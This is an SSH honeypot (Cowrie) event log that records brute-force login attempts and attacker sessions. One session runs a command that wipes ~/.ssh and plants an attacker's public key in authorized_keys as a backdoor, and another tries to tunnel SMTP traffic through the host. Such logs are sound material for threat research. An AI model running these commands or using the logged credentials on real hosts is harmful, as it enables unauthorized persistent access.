{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:54.987324Z","src_ip":"172.236.228.227","session":"4899ea7c8b44"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.227","src_port":17234,"dst_ip":"1.2.3.4","dst_port":22,"session":"06e322e0d87b","protocol":"ssh","message":"New connection: 172.236.228.227:17234 (1.2.3.4:22) [session: 06e322e0d87b]","sensor":"my-vps","timestamp":"2025-08-28T18:11:55.188338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:11:55.502327Z","src_ip":"172.236.228.227","session":"06e322e0d87b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:11:55.503176Z","src_ip":"172.236.228.227","session":"06e322e0d87b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:56.502798Z","src_ip":"172.236.228.227","session":"06e322e0d87b"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.227","src_port":51074,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8500a893b02","protocol":"ssh","message":"New connection: 172.236.228.227:51074 (1.2.3.4:22) [session: b8500a893b02]","sensor":"my-vps","timestamp":"2025-08-28T18:11:56.674776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:11:56.961492Z","src_ip":"172.236.228.227","session":"b8500a893b02"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:11:56.962230Z","src_ip":"172.236.228.227","session":"b8500a893b02"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:57.928321Z","src_ip":"172.236.228.227","session":"b8500a893b02"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":33702,"dst_ip":"1.2.3.4","dst_port":22,"session":"b49c114240c5","protocol":"ssh","message":"New connection: 199.195.253.95:33702 (1.2.3.4:22) [session: b49c114240c5]","sensor":"my-vps","timestamp":"2025-08-28T18:12:40.764740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:12:40.770838Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:12:40.884966Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456..","message":"login attempt [root/AA123456..] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:12:41.483916Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:12:41.915649Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:12:41.916449Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:12:41.917920Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:12:42.150171Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:12:42.588414Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:12:42.589110Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:12:42.832806Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:12:42.833770Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":34676,"dst_ip":"1.2.3.4","dst_port":22,"session":"09b47eb896ee","protocol":"ssh","message":"New connection: 199.195.253.95:34676 (1.2.3.4:22) [session: 09b47eb896ee]","sensor":"my-vps","timestamp":"2025-08-28T18:12:43.068789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:12:43.082189Z","src_ip":"199.195.253.95","session":"09b47eb896ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:12:43.312127Z","src_ip":"199.195.253.95","session":"09b47eb896ee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:12:44.165011Z","src_ip":"199.195.253.95","session":"09b47eb896ee"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:12:45.343724Z","src_ip":"199.195.253.95","session":"09b47eb896ee"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":35518,"dst_ip":"1.2.3.4","dst_port":22,"session":"79cb42404999","protocol":"ssh","message":"New connection: 199.195.253.95:35518 (1.2.3.4:22) [session: 79cb42404999]","sensor":"my-vps","timestamp":"2025-08-28T18:12:45.510996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:12:45.515069Z","src_ip":"199.195.253.95","session":"79cb42404999"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:12:45.661308Z","src_ip":"199.195.253.95","session":"79cb42404999"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:12:46.304324Z","src_ip":"199.195.253.95","session":"79cb42404999"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:12:46.499351Z","src_ip":"199.195.253.95","session":"b49c114240c5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:12:46.500141Z","src_ip":"199.195.253.95","session":"79cb42404999"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16565,"dst_ip":"1.2.3.4","dst_port":22,"session":"f56906d38522","protocol":"ssh","message":"New connection: 212.227.235.229:16565 (1.2.3.4:22) [session: f56906d38522]","sensor":"my-vps","timestamp":"2025-08-28T18:13:39.964541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:13:40.030267Z","src_ip":"212.227.235.229","session":"f56906d38522"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:13:40.154376Z","src_ip":"212.227.235.229","session":"f56906d38522"}
{"eventid":"cowrie.login.success","username":"root","password":"admin01","message":"login attempt [root/admin01] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:13:40.703885Z","src_ip":"212.227.235.229","session":"f56906d38522"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T18:13:40.833499Z","session":"f56906d38522"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T18:13:40.961710Z","src_ip":"212.227.235.229","session":"f56906d38522"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:13:41.089362Z","src_ip":"212.227.235.229","session":"f56906d38522"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":58910,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4fd760de17e","protocol":"ssh","message":"New connection: 199.195.253.95:58910 (1.2.3.4:22) [session: a4fd760de17e]","sensor":"my-vps","timestamp":"2025-08-28T18:13:52.633061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:13:52.642318Z","src_ip":"199.195.253.95","session":"a4fd760de17e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:13:52.884522Z","src_ip":"199.195.253.95","session":"a4fd760de17e"}
{"eventid":"cowrie.login.failed","username":"user","password":"123321","message":"login attempt [user/123321] failed","sensor":"my-vps","timestamp":"2025-08-28T18:13:53.936004Z","src_ip":"199.195.253.95","session":"a4fd760de17e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:13:55.205842Z","src_ip":"199.195.253.95","session":"a4fd760de17e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62130,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40394b74ca6","protocol":"ssh","message":"New connection: 217.72.205.35:62130 (1.2.3.4:22) [session: f40394b74ca6]","sensor":"my-vps","timestamp":"2025-08-28T18:14:23.027118Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:14:23.028310Z","src_ip":"217.72.205.35","session":"f40394b74ca6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43442,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6db3e083ecc","protocol":"ssh","message":"New connection: 212.227.235.229:43442 (1.2.3.4:22) [session: b6db3e083ecc]","sensor":"my-vps","timestamp":"2025-08-28T18:14:49.577374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:14:49.579088Z","src_ip":"212.227.235.229","session":"b6db3e083ecc"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:14:49.683968Z","src_ip":"212.227.235.229","session":"b6db3e083ecc"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123456","message":"login attempt [sol/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T18:14:50.000175Z","src_ip":"212.227.235.229","session":"b6db3e083ecc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:14:51.107426Z","src_ip":"212.227.235.229","session":"b6db3e083ecc"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":55882,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ede939a1ce3","protocol":"ssh","message":"New connection: 199.195.253.95:55882 (1.2.3.4:22) [session: 6ede939a1ce3]","sensor":"my-vps","timestamp":"2025-08-28T18:15:00.497051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:15:00.502064Z","src_ip":"199.195.253.95","session":"6ede939a1ce3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:15:00.717341Z","src_ip":"199.195.253.95","session":"6ede939a1ce3"}
{"eventid":"cowrie.login.failed","username":"servidor","password":"servidor","message":"login attempt [servidor/servidor] failed","sensor":"my-vps","timestamp":"2025-08-28T18:15:01.783635Z","src_ip":"199.195.253.95","session":"6ede939a1ce3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:15:03.009638Z","src_ip":"199.195.253.95","session":"6ede939a1ce3"}
